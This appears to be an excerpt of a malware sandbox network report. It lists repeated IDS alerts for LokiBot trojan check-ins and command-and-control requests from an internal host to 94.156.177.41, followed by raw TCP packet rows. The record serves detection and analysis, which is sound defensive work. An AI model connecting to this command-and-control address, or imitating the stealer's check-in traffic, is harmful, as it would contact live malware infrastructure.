                                2025-01-11T01:43:44.785246+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85132794.156.177.4180TCP
                                2025-01-11T01:43:44.785246+01002025381ET MALWARE LokiBot Checkin1192.168.2.85132794.156.177.4180TCP
                                2025-01-11T01:43:44.785246+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85132794.156.177.4180TCP
                                2025-01-11T01:43:45.582363+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85132794.156.177.4180TCP
                                2025-01-11T01:43:45.582363+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85132794.156.177.4180TCP
                                2025-01-11T01:43:45.736146+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85133394.156.177.4180TCP
                                2025-01-11T01:43:45.736146+01002025381ET MALWARE LokiBot Checkin1192.168.2.85133394.156.177.4180TCP
                                2025-01-11T01:43:45.736146+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85133394.156.177.4180TCP
                                2025-01-11T01:43:46.438299+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85133394.156.177.4180TCP
                                2025-01-11T01:43:46.438299+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85133394.156.177.4180TCP
                                2025-01-11T01:43:46.597242+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85133994.156.177.4180TCP
                                2025-01-11T01:43:46.597242+01002025381ET MALWARE LokiBot Checkin1192.168.2.85133994.156.177.4180TCP
                                2025-01-11T01:43:46.597242+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85133994.156.177.4180TCP
                                2025-01-11T01:43:47.295907+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85133994.156.177.4180TCP
                                2025-01-11T01:43:47.295907+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85133994.156.177.4180TCP
                                2025-01-11T01:43:47.457823+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85134694.156.177.4180TCP
                                2025-01-11T01:43:47.457823+01002025381ET MALWARE LokiBot Checkin1192.168.2.85134694.156.177.4180TCP
                                2025-01-11T01:43:47.457823+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85134694.156.177.4180TCP
                                2025-01-11T01:43:48.196551+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85134694.156.177.4180TCP
                                2025-01-11T01:43:48.196551+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85134694.156.177.4180TCP
                                2025-01-11T01:43:48.358447+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85135394.156.177.4180TCP
                                2025-01-11T01:43:48.358447+01002025381ET MALWARE LokiBot Checkin1192.168.2.85135394.156.177.4180TCP
                                2025-01-11T01:43:48.358447+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85135394.156.177.4180TCP
                                2025-01-11T01:43:49.076139+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85135394.156.177.4180TCP
                                2025-01-11T01:43:49.076139+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85135394.156.177.4180TCP
                                2025-01-11T01:43:49.238277+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85136094.156.177.4180TCP
                                2025-01-11T01:43:49.238277+01002025381ET MALWARE LokiBot Checkin1192.168.2.85136094.156.177.4180TCP
                                2025-01-11T01:43:49.238277+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85136094.156.177.4180TCP
                                2025-01-11T01:43:49.953109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85136094.156.177.4180TCP
                                2025-01-11T01:43:49.953109+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85136094.156.177.4180TCP
                                2025-01-11T01:43:50.112871+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85136894.156.177.4180TCP
                                2025-01-11T01:43:50.112871+01002025381ET MALWARE LokiBot Checkin1192.168.2.85136894.156.177.4180TCP
                                2025-01-11T01:43:50.112871+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85136894.156.177.4180TCP
                                2025-01-11T01:43:50.836273+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85136894.156.177.4180TCP
                                2025-01-11T01:43:50.836273+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85136894.156.177.4180TCP
                                2025-01-11T01:43:50.991939+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85137494.156.177.4180TCP
                                2025-01-11T01:43:50.991939+01002025381ET MALWARE LokiBot Checkin1192.168.2.85137494.156.177.4180TCP
                                2025-01-11T01:43:50.991939+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85137494.156.177.4180TCP
                                2025-01-11T01:43:51.718554+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85137494.156.177.4180TCP
                                2025-01-11T01:43:51.718554+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85137494.156.177.4180TCP
                                2025-01-11T01:43:51.872833+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85138094.156.177.4180TCP
                                2025-01-11T01:43:51.872833+01002025381ET MALWARE LokiBot Checkin1192.168.2.85138094.156.177.4180TCP
                                2025-01-11T01:43:51.872833+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85138094.156.177.4180TCP
                                2025-01-11T01:43:52.590087+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85138094.156.177.4180TCP
                                2025-01-11T01:43:52.590087+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85138094.156.177.4180TCP
                                2025-01-11T01:43:53.011219+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85138894.156.177.4180TCP
                                2025-01-11T01:43:53.011219+01002025381ET MALWARE LokiBot Checkin1192.168.2.85138894.156.177.4180TCP
                                2025-01-11T01:43:53.011219+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85138894.156.177.4180TCP
                                2025-01-11T01:43:53.748109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85138894.156.177.4180TCP
                                2025-01-11T01:43:53.748109+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85138894.156.177.4180TCP
                                2025-01-11T01:43:53.904054+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85139594.156.177.4180TCP
                                2025-01-11T01:43:53.904054+01002025381ET MALWARE LokiBot Checkin1192.168.2.85139594.156.177.4180TCP
                                2025-01-11T01:43:53.904054+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85139594.156.177.4180TCP
                                2025-01-11T01:43:54.614974+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85139594.156.177.4180TCP
                                2025-01-11T01:43:54.614974+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85139594.156.177.4180TCP
                                2025-01-11T01:43:54.763804+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85140394.156.177.4180TCP
                                2025-01-11T01:43:54.763804+01002025381ET MALWARE LokiBot Checkin1192.168.2.85140394.156.177.4180TCP
                                2025-01-11T01:43:54.763804+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85140394.156.177.4180TCP
                                2025-01-11T01:43:55.488808+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85140394.156.177.4180TCP
                                2025-01-11T01:43:55.488808+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85140394.156.177.4180TCP
                                2025-01-11T01:43:55.926731+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85140694.156.177.4180TCP
                                2025-01-11T01:43:55.926731+01002025381ET MALWARE LokiBot Checkin1192.168.2.85140694.156.177.4180TCP
                                2025-01-11T01:43:55.926731+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85140694.156.177.4180TCP
                                2025-01-11T01:43:56.636237+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85140694.156.177.4180TCP
                                2025-01-11T01:43:56.636237+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85140694.156.177.4180TCP
                                2025-01-11T01:43:56.799040+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85141594.156.177.4180TCP
                                2025-01-11T01:43:56.799040+01002025381ET MALWARE LokiBot Checkin1192.168.2.85141594.156.177.4180TCP
                                2025-01-11T01:43:56.799040+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85141594.156.177.4180TCP
                                2025-01-11T01:43:57.548619+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85141594.156.177.4180TCP
                                2025-01-11T01:43:57.548619+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85141594.156.177.4180TCP
                                2025-01-11T01:43:57.706794+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85142194.156.177.4180TCP
                                2025-01-11T01:43:57.706794+01002025381ET MALWARE LokiBot Checkin1192.168.2.85142194.156.177.4180TCP
                                2025-01-11T01:43:57.706794+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85142194.156.177.4180TCP
                                2025-01-11T01:43:58.432809+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85142194.156.177.4180TCP
                                2025-01-11T01:43:58.432809+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85142194.156.177.4180TCP
                                2025-01-11T01:43:58.606872+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85142794.156.177.4180TCP
                                2025-01-11T01:43:58.606872+01002025381ET MALWARE LokiBot Checkin1192.168.2.85142794.156.177.4180TCP
                                2025-01-11T01:43:58.606872+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85142794.156.177.4180TCP
                                2025-01-11T01:43:59.294217+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85142794.156.177.4180TCP
                                2025-01-11T01:43:59.294217+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85142794.156.177.4180TCP
                                2025-01-11T01:43:59.461313+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85143394.156.177.4180TCP
                                2025-01-11T01:43:59.461313+01002025381ET MALWARE LokiBot Checkin1192.168.2.85143394.156.177.4180TCP
                                2025-01-11T01:43:59.461313+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85143394.156.177.4180TCP
                                2025-01-11T01:44:00.168919+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85143394.156.177.4180TCP
                                2025-01-11T01:44:00.168919+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85143394.156.177.4180TCP
                                2025-01-11T01:44:00.327731+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85143994.156.177.4180TCP
                                2025-01-11T01:44:00.327731+01002025381ET MALWARE LokiBot Checkin1192.168.2.85143994.156.177.4180TCP
                                2025-01-11T01:44:00.327731+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85143994.156.177.4180TCP
                                2025-01-11T01:44:01.029999+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85143994.156.177.4180TCP
                                2025-01-11T01:44:01.029999+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85143994.156.177.4180TCP
                                2025-01-11T01:44:01.206037+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85144694.156.177.4180TCP
                                2025-01-11T01:44:01.206037+01002025381ET MALWARE LokiBot Checkin1192.168.2.85144694.156.177.4180TCP
                                2025-01-11T01:44:01.206037+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85144694.156.177.4180TCP
                                2025-01-11T01:44:01.911205+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85144694.156.177.4180TCP
                                2025-01-11T01:44:01.911205+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85144694.156.177.4180TCP
                                2025-01-11T01:44:02.066708+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85145494.156.177.4180TCP
                                2025-01-11T01:44:02.066708+01002025381ET MALWARE LokiBot Checkin1192.168.2.85145494.156.177.4180TCP
                                2025-01-11T01:44:02.066708+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85145494.156.177.4180TCP
                                2025-01-11T01:44:02.788148+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85145494.156.177.4180TCP
                                2025-01-11T01:44:02.788148+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85145494.156.177.4180TCP
                                2025-01-11T01:44:03.052322+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85145994.156.177.4180TCP
                                2025-01-11T01:44:03.052322+01002025381ET MALWARE LokiBot Checkin1192.168.2.85145994.156.177.4180TCP
                                2025-01-11T01:44:03.052322+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85145994.156.177.4180TCP
                                2025-01-11T01:44:03.775125+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85145994.156.177.4180TCP
                                2025-01-11T01:44:03.775125+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85145994.156.177.4180TCP
                                2025-01-11T01:44:03.938794+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85146894.156.177.4180TCP
                                2025-01-11T01:44:03.938794+01002025381ET MALWARE LokiBot Checkin1192.168.2.85146894.156.177.4180TCP
                                2025-01-11T01:44:03.938794+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85146894.156.177.4180TCP
                                2025-01-11T01:44:04.664084+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85146894.156.177.4180TCP
                                2025-01-11T01:44:04.664084+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85146894.156.177.4180TCP
                                2025-01-11T01:44:04.874883+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85147494.156.177.4180TCP
                                2025-01-11T01:44:04.874883+01002025381ET MALWARE LokiBot Checkin1192.168.2.85147494.156.177.4180TCP
                                2025-01-11T01:44:04.874883+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85147494.156.177.4180TCP
                                2025-01-11T01:44:05.575862+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85147494.156.177.4180TCP
                                2025-01-11T01:44:05.575862+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85147494.156.177.4180TCP
                                2025-01-11T01:44:05.900134+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85148094.156.177.4180TCP
                                2025-01-11T01:44:05.900134+01002025381ET MALWARE LokiBot Checkin1192.168.2.85148094.156.177.4180TCP
                                2025-01-11T01:44:05.900134+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85148094.156.177.4180TCP
                                2025-01-11T01:44:06.645085+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85148094.156.177.4180TCP
                                2025-01-11T01:44:06.645085+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85148094.156.177.4180TCP
                                2025-01-11T01:44:06.794404+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85148694.156.177.4180TCP
                                2025-01-11T01:44:06.794404+01002025381ET MALWARE LokiBot Checkin1192.168.2.85148694.156.177.4180TCP
                                2025-01-11T01:44:06.794404+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85148694.156.177.4180TCP
                                2025-01-11T01:44:07.690650+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85148694.156.177.4180TCP
                                2025-01-11T01:44:07.690650+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85148694.156.177.4180TCP
                                2025-01-11T01:44:07.842580+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85149794.156.177.4180TCP
                                2025-01-11T01:44:07.842580+01002025381ET MALWARE LokiBot Checkin1192.168.2.85149794.156.177.4180TCP
                                2025-01-11T01:44:07.842580+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85149794.156.177.4180TCP
                                2025-01-11T01:44:08.542955+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85149794.156.177.4180TCP
                                2025-01-11T01:44:08.542955+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85149794.156.177.4180TCP
                                2025-01-11T01:44:08.809214+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85150394.156.177.4180TCP
                                2025-01-11T01:44:08.809214+01002025381ET MALWARE LokiBot Checkin1192.168.2.85150394.156.177.4180TCP
                                2025-01-11T01:44:08.809214+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85150394.156.177.4180TCP
                                2025-01-11T01:44:09.524805+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85150394.156.177.4180TCP
                                2025-01-11T01:44:09.524805+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85150394.156.177.4180TCP
                                2025-01-11T01:44:09.691470+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85150994.156.177.4180TCP
                                2025-01-11T01:44:09.691470+01002025381ET MALWARE LokiBot Checkin1192.168.2.85150994.156.177.4180TCP
                                2025-01-11T01:44:09.691470+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85150994.156.177.4180TCP
                                2025-01-11T01:44:10.390018+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85150994.156.177.4180TCP
                                2025-01-11T01:44:10.390018+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85150994.156.177.4180TCP
                                2025-01-11T01:44:10.558794+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85151594.156.177.4180TCP
                                2025-01-11T01:44:10.558794+01002025381ET MALWARE LokiBot Checkin1192.168.2.85151594.156.177.4180TCP
                                2025-01-11T01:44:10.558794+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85151594.156.177.4180TCP
                                2025-01-11T01:44:11.267558+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85151594.156.177.4180TCP
                                2025-01-11T01:44:11.267558+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85151594.156.177.4180TCP
                                2025-01-11T01:44:11.428450+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85152194.156.177.4180TCP
                                2025-01-11T01:44:11.428450+01002025381ET MALWARE LokiBot Checkin1192.168.2.85152194.156.177.4180TCP
                                2025-01-11T01:44:11.428450+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85152194.156.177.4180TCP
                                2025-01-11T01:44:12.275424+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85152194.156.177.4180TCP
                                2025-01-11T01:44:12.275424+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85152194.156.177.4180TCP
                                2025-01-11T01:44:12.445729+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85153194.156.177.4180TCP
                                2025-01-11T01:44:12.445729+01002025381ET MALWARE LokiBot Checkin1192.168.2.85153194.156.177.4180TCP
                                2025-01-11T01:44:12.445729+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85153194.156.177.4180TCP
                                2025-01-11T01:44:13.186096+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85153194.156.177.4180TCP
                                2025-01-11T01:44:13.186096+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85153194.156.177.4180TCP
                                2025-01-11T01:44:13.353273+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85153794.156.177.4180TCP
                                2025-01-11T01:44:13.353273+01002025381ET MALWARE LokiBot Checkin1192.168.2.85153794.156.177.4180TCP
                                2025-01-11T01:44:13.353273+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85153794.156.177.4180TCP
                                2025-01-11T01:44:14.053421+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85153794.156.177.4180TCP
                                2025-01-11T01:44:14.053421+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85153794.156.177.4180TCP
                                2025-01-11T01:44:14.206617+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85154494.156.177.4180TCP
                                2025-01-11T01:44:14.206617+01002025381ET MALWARE LokiBot Checkin1192.168.2.85154494.156.177.4180TCP
                                2025-01-11T01:44:14.206617+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85154494.156.177.4180TCP
                                2025-01-11T01:44:14.935173+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85154494.156.177.4180TCP
                                2025-01-11T01:44:14.935173+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85154494.156.177.4180TCP
                                2025-01-11T01:44:15.088828+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85155094.156.177.4180TCP
                                2025-01-11T01:44:15.088828+01002025381ET MALWARE LokiBot Checkin1192.168.2.85155094.156.177.4180TCP
                                2025-01-11T01:44:15.088828+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85155094.156.177.4180TCP
                                2025-01-11T01:44:15.838515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85155094.156.177.4180TCP
                                2025-01-11T01:44:15.838515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85155094.156.177.4180TCP
                                2025-01-11T01:44:16.015685+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85155794.156.177.4180TCP
                                2025-01-11T01:44:16.015685+01002025381ET MALWARE LokiBot Checkin1192.168.2.85155794.156.177.4180TCP
                                2025-01-11T01:44:16.015685+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85155794.156.177.4180TCP
                                2025-01-11T01:44:16.721393+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85155794.156.177.4180TCP
                                2025-01-11T01:44:16.721393+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85155794.156.177.4180TCP
                                2025-01-11T01:44:16.870270+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85156594.156.177.4180TCP
                                2025-01-11T01:44:16.870270+01002025381ET MALWARE LokiBot Checkin1192.168.2.85156594.156.177.4180TCP
                                2025-01-11T01:44:16.870270+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85156594.156.177.4180TCP
                                2025-01-11T01:44:17.604119+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85156594.156.177.4180TCP
                                2025-01-11T01:44:17.604119+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85156594.156.177.4180TCP
                                2025-01-11T01:44:17.776454+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85157194.156.177.4180TCP
                                2025-01-11T01:44:17.776454+01002025381ET MALWARE LokiBot Checkin1192.168.2.85157194.156.177.4180TCP
                                2025-01-11T01:44:17.776454+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85157194.156.177.4180TCP
                                2025-01-11T01:44:18.481641+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85157194.156.177.4180TCP
                                2025-01-11T01:44:18.481641+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85157194.156.177.4180TCP
                                2025-01-11T01:44:18.905117+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85157794.156.177.4180TCP
                                2025-01-11T01:44:18.905117+01002025381ET MALWARE LokiBot Checkin1192.168.2.85157794.156.177.4180TCP
                                2025-01-11T01:44:18.905117+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85157794.156.177.4180TCP
                                2025-01-11T01:44:19.611694+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85157794.156.177.4180TCP
                                2025-01-11T01:44:19.611694+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85157794.156.177.4180TCP
                                2025-01-11T01:44:19.764965+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158194.156.177.4180TCP
                                2025-01-11T01:44:19.764965+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158194.156.177.4180TCP
                                2025-01-11T01:44:19.764965+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158194.156.177.4180TCP
                                2025-01-11T01:44:20.466096+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158194.156.177.4180TCP
                                2025-01-11T01:44:20.466096+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158194.156.177.4180TCP
                                2025-01-11T01:44:20.625881+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158294.156.177.4180TCP
                                2025-01-11T01:44:20.625881+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158294.156.177.4180TCP
                                2025-01-11T01:44:20.625881+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158294.156.177.4180TCP
                                2025-01-11T01:44:21.591884+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158294.156.177.4180TCP
                                2025-01-11T01:44:21.591884+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158294.156.177.4180TCP
                                2025-01-11T01:44:21.737700+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158394.156.177.4180TCP
                                2025-01-11T01:44:21.737700+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158394.156.177.4180TCP
                                2025-01-11T01:44:21.737700+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158394.156.177.4180TCP
                                2025-01-11T01:44:22.440616+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158394.156.177.4180TCP
                                2025-01-11T01:44:22.440616+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158394.156.177.4180TCP
                                2025-01-11T01:44:22.607373+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158494.156.177.4180TCP
                                2025-01-11T01:44:22.607373+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158494.156.177.4180TCP
                                2025-01-11T01:44:22.607373+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158494.156.177.4180TCP
                                2025-01-11T01:44:23.341846+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158494.156.177.4180TCP
                                2025-01-11T01:44:23.341846+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158494.156.177.4180TCP
                                2025-01-11T01:44:23.517156+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158594.156.177.4180TCP
                                2025-01-11T01:44:23.517156+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158594.156.177.4180TCP
                                2025-01-11T01:44:23.517156+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158594.156.177.4180TCP
                                2025-01-11T01:44:24.227497+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158594.156.177.4180TCP
                                2025-01-11T01:44:24.227497+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158594.156.177.4180TCP
                                2025-01-11T01:44:24.362511+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158694.156.177.4180TCP
                                2025-01-11T01:44:24.362511+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158694.156.177.4180TCP
                                2025-01-11T01:44:24.362511+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158694.156.177.4180TCP
                                2025-01-11T01:44:25.071196+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158694.156.177.4180TCP
                                2025-01-11T01:44:25.071196+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158694.156.177.4180TCP
                                2025-01-11T01:44:25.207598+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.85158794.156.177.4180TCP
                                2025-01-11T01:44:25.207598+01002025381ET MALWARE LokiBot Checkin1192.168.2.85158794.156.177.4180TCP
                                2025-01-11T01:44:25.207598+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.85158794.156.177.4180TCP
                                2025-01-11T01:44:25.895893+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.85158794.156.177.4180TCP
                                2025-01-11T01:44:25.895893+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.85158794.156.177.4180TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 11, 2025 01:42:20.804887056 CET4970480192.168.2.894.156.177.41
                                Jan 11, 2025 01:42:20.809968948 CET804970494.156.177.41192.168.2.8
                                Jan 11, 2025 01:42:20.810062885 CET4970480192.168.2.894.156.177.41
                                Jan 11, 2025 01:42:20.812382936 CET4970480192.168.2.894.156.177.41
                                Jan 11, 2025 01:42:20.817229033 CET804970494.156.177.41192.168.2.8
